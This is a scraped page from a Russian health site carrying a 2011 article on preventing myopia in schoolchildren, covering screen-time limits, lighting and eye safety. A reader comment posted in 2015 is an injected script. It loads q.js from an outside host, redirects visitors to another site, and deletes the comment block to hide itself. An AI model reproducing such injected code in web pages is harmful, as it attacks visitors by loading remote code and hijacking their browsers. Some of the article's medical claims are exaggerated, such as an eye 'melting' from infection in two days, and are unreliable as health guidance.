Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Школьная пора. Очей очаро...  >>  Школьная пора. Очей очарование
 
Обратная связь
 

Школьная пора. Очей очарование

Размер шрифта
01 сентября 2011 07:00
  • google_analytics: false
  • Нравится

Близорукость с 1 по 10 классы у школьников увеличивается в два с половиной раза. Можно ли остановить этот дефект зрения, прогрессирующий вместе с технической революцией, и о чем должны помнить родители, если ребенок надел очки?

Глаза

Екатерина Олейникова / «Здоровье инфо»

Как и всегда, первые школьные дни, тем более, если они еще и первые в жизни ребенка, прежде всего, связаны со стрессом. Многочасовые занятия в школе, выполнение заданий дома, внеклассные кружки. И это еще полбеды. Современному ребенку открыты не только учебники. Компьютер, мобильные телефоны, электронные книги (на которые планируется в будущем перенести все учебники). Все это, конечно, разгрузит ранец и спину, но как быть с возрастающей в разы нагрузкой на зрение?

Есть, конечно, такие факторы, которые нельзя просто так устранить: наследственность, плохая экология, приобретенные заболевания.

Но вот с остальными можно и нужно бороться, иначе не трудно довести ребенка и до крайней степени близорукости, или даже до слепоты. На что должен родитель обратить внимание в первую очередь?

Во-первых, помните, что не всякий малыш в состоянии рассказать о своих ощущениях просто потому, что еще не до конца научился их анализировать. Все зависит от вашей наблюдательности. Если вы видите, что ребенок стал неправильно держать голову, например, под углом, старается ближе сесть к телевизору, часто и до красноты трет глаза, если он жалуется, что глаза устали, и он не хочет заниматься, прислушайтесь. Далеко не всегда это обычный каприз. И уж тем более нужно идти к врачу, если вы заметили, что ребенок стал спотыкаться при ходьбе. Не теряйте времени!

Во-вторых, если вы считаете себя заботливым родителем, обязательно ознакомьтесь с существующими СанПинами, регламентирующими количество времени, которое ребенок может проводить за компьютером.

Ребенок дошкольного возраста может посидеть за компьютером не более 10 минут раз в день 3 раза в неделю.

С 1 по 4 класс – не более 10 минут на одном уроке.
С 5 по 7 классы – не более 15 минут на одном уроке.
С 7 по 9 классы – не более 20 минут на уроке.

Старшеклассники имеют право на 30 минут на первом уроке, и не более 20 минут на втором.

Комп

Учтите, что если у одного из родителей есть патология зрения, то ребенку до 9 лет запрещено работать на компьютере.

Поговорите с педагогами: во время уроков они должны устраивать небольшие перерывы, чтобы ребенок успел разгрузить свой зрительный анализатор. Ему должна быть предоставлена возможность переключиться и расслабиться.

Если вам «повезло», и вы как раз находитесь в регионе, где с этого года часть учебников переводят на букридеры, позаботьтесь, чтобы эта техника была очень качественной и соответствовала всем гостам. Текст в хорошем букридере не должен мерцать, на экране не должно быть никаких бликов.

Даже если ребенок читает не с экрана, а с листа, давайте вспомним, как организовать правильное освещение в комнате, где занимается ребенок. Помещение должно быть хорошо освещено. Главный источник освещения должен располагаться слева и сверху. Лампочка в 60 ватт вполне способна осветить рабочее место ребенка так, чтобы не ослеплять его. Свет не должен падать на лицо ребенка. Размер шрифта должен быть не меньше 4 миллиметров. Желательно, чтобы книга находилась на подставке под углом 45 градусов. Расстояние до книги должно быть не менее 30 сантиметров. Если ребенок читает с экрана, уберите все бликующие поверхности. Ничто не должно светить ребенку прямо в лицо. Центральная линия экрана должна быть на уровне центрального взора ребенка. Экран не должен мигать или мерцать.

Если ребенок пристально смотрит передачу или, не мигая, уставился на экран монитора, напоминайте ему о том, что надо моргать. Только так глаз омывается необходимой слезной жидкостью. Если сокращается количество морганий, развивается синдром сухого глаза, и ребенок, потерев глаза руками, занесет инфекцию. Это может привести к воспалениям, конъюнктивитам. Год-полтора – и недалеко до эрозии и язвы роговицы. Многие дети сейчас приходят к врачу с инфекциями. А глаз расплавляется в инфекции за два дня. И все – слепота.

Также помните, что ни учебник, ни букридер нельзя читать в транспорте, иначе постоянная вибрация будет истощать глазные мышцы, отвечающие за фокусировку, и в итоге начальная близорукость будет только прогрессировать. Запретите ребенку читать лежа, в том числе и электронную книгу.

Понятно, что ситуации складываются вопреки всяким нормативам, но и в случае необходимых перегрузок, вам надо следить, чтобы одна деятельность сменяла другую, тем более, если ребенок вынужден много читать. Стресс от постоянных занятий и усталость помогут снять подвижные игры. Кстати, они же будут развивать опорно-двигательный аппарат школьника и улучшать кровоток. Именно кровоток часто бывает виноват в том, что у ребенка начинает садиться зрение.

1

Очень хороши в деле спасения зрения плавание и игра в бадминтон. В начале лета мы уже рассказывали об исследовании, проведенном на базе Федерации бадминтона, которое показало, что у детей, которые занимаются бадминтоном, отлично корректируется начальная стадия близорукости за счет постоянной тренировки мышц, отвечающих за фокусировку. Следя за воланом, ребенок тренирует аккомодационные мышцы. Кроме того, укрепляется фиброзная оболочка глаза.

Плавание, в свою очередь, разгружает позвоночник. Одна из теорий, прослеживающих развитие близорукости, сообщает, что вся беда в плохом кровоснабжении глазного яблока. Плавание отлично разгружает позвоночник и улучшает приток крови к голове. Плюс у ребенка отлично развиваются мышцы, улучшается общее состояние здоровья.

Будьте осторожны и с выбором развлечений для школьника. Опасность представляет любая игрушка, если из нее можно попасть в глаз. К ним относятся разные пневматические ружья, пульки от которых способны пробивать внутреннее тело глаза, хрусталик, радужку, задний отдел глаза и сетчатку.

Пулька для рогатки, даже если она сделана из мякиша или пластилина, может нанести серьезную травму: от удара в глазу развиваются повышенное давление, глаукома, может открыться кровотечение. Кровь в глазу рассасывается очень долго, что приводит к потере зрения.

Лазерные указки с обжигающими свойствами в нашей стране запрещены, однако очень многие привозят такие игрушки из-за границы. Поинтересуйтесь у своего ребенка, не принес ли кто из одноклассников на занятия указку с зеленой точкой. Именно такие должны вызывать опасения. Даже маломощные указки способны вызвать ожоги.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:08

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Хотите поразить людей – не заморачивайтесь о том, что снизу. Люди видят только верх!   Как понять, что у вашего ребенка проблемы со зрением   Хорошее зрение для отличных знаний   Как сохранить детское зрение  
26 октября 2011Близорукость у ребенка? Отправляйтесь на прогулку 03 октября 2013Результаты благотворительного марафона «Всем миром»
 
17 июля 2013Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца! 10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка
 

Слайдшоу

1
Можно ли пережить беременность без рвоты?
Убийцы в вашей ванной
Можно ли подгадать с беременностью?

Тесты

1
Что вы знаете о грудном вскармливании?
Что вы знаете об СДВГ?
Проверьте свое зрение
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.